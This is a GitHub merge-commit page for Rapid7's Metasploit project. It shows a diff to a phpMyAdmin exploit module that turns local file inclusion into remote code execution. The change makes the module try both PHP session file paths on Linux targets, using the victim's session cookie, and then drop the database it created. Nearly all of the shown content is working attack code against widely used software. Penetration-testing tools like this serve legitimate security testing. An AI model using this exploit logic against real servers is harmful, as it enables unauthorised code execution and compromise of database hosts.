Merge pull request #1 from jrobles-r7/pr10487

Additional path for Linux target
rapid7 · Aug 24, 2018 · 332036b · 332036b
2 parents b9809d9 + 7f3824b
commit 332036b
Showing 1 changed file with 10 additions and 11 deletions.
diff --git a/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb b/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb
@@ -39,8 +39,7 @@ def initialize(info = {})
         [
           [ 'Automatic', {} ],
           [ 'Windows', {} ],
-          [ 'Linux', {} ],
-          [ 'Linux / php5', {} ]
+          [ 'Linux', {} ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 19 2018'))
@@ -212,22 +211,22 @@ def exploit
       fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
     end
 
+    paths = []
     #Creating include path
     if mytarget == 'Windows'
       #Table file location
-      data_path = $1.gsub(/\\/, '/')
-      data_path = data_path.sub(/^.*?\//, '/')
-      data_path << "#{database}/#{table}.frm"
-    elsif mytarget == 'Linux'
-      #Session path location
-      /phpMyAdmin=(?<session_name>.*?);/ =~ cookies
-      data_path = "/var/lib/php/sessions/sess_#{session_name}"
+      tmp_path = $1.gsub(/\\/, '/')
+      tmp_path = tmp_path.sub(/^.*?\//, '/')
+      tmp_path << "#{database}/#{table}.frm"
+      paths.append(tmp_path)
     else
+      #Session path location
       /phpMyAdmin=(?<session_name>.*?);/ =~ cookies
-      data_path = "/var/lib/php5/sess_#{session_name}"
+      paths.append("/var/lib/php/sessions/sess_#{session_name}")
+      paths.append("/var/lib/php5/sess_#{session_name}")
     end
 
-    res = lfi(uri, data_path, cookies, token)
+    paths.each {|data_path| lfi(uri, data_path, cookies, token)}
 
     #Drop database
     res = query(uri, dropsql, cookies, token)